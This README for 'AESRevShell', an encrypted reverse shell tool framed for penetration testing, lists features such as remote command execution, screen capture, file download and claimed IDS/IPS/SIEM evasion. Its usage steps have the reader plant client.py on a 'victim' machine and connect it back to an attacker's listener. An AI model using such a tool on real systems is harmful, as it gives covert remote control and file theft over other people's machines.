AESRevShell is a secure reverse shell tool that utilizes:
- AES-GCM for authenticated encryption
- ECDH (Elliptic Curve Diffie-Hellman) for secure key exchange
- HKDF for key derivation
Ideal for pentesting and security research in monitored environments.
| Feature | Description |
|---|---|
| MITM Protection | ECDH prevents interception |
| Forward Secrecy | Ephemeral session keys |
| Command Execution | Remote command execution with encrypted responses |
| Encrypted Screenshots | Captures and encrypts target screen |
| Traffic Obfuscation | Bypasses IDS/IPS/SIEM |
| Cross-Platform | Works on Linux/Windows/macOS |
| No Key Sharing | Automatic secure exchange |
sequenceDiagram
participant Server
participant Client
Server->>Client: Public Key (ECDH)
Client->>Server: Public Key (ECDH)
Note right of Server: Derives shared secret
Note left of Client: Derives shared secret
Server->>Client: Encrypted (AES-GCM) Command
Client->>Server: Encrypted Response
-
Install dependencies:
sudo apt update && sudo apt install -y python3-pip python3 -m pip install --upgrade cryptography -
Clone the repository:
git clone https://github.com/OusH4x/AESRevShell cd AESRevShell -
Make the scripts executable:
chmod +x client.py server.py
- Upload the 'client.py' into victim's machine
Start the server (attacker) with the desired IP and port:
./server.py -i 0.0.0.0 -p 443Connect the client (victim) to the server:
./client.py -s SERVER_IP -p SERVER_PORTscreenshot- Captures target screendownload FILE(S)- Download one or more filesexit- Terminates sessionCTRL + L- Clears console
This tool is intended for educational purposes and authorized penetration testing only. Do not use it for malicious purposes. The authors are not responsible for any misuse of this tool.
Contributions are welcome! If you have any suggestions, improvements, or bug fixes, feel free to open an issue or submit a pull request.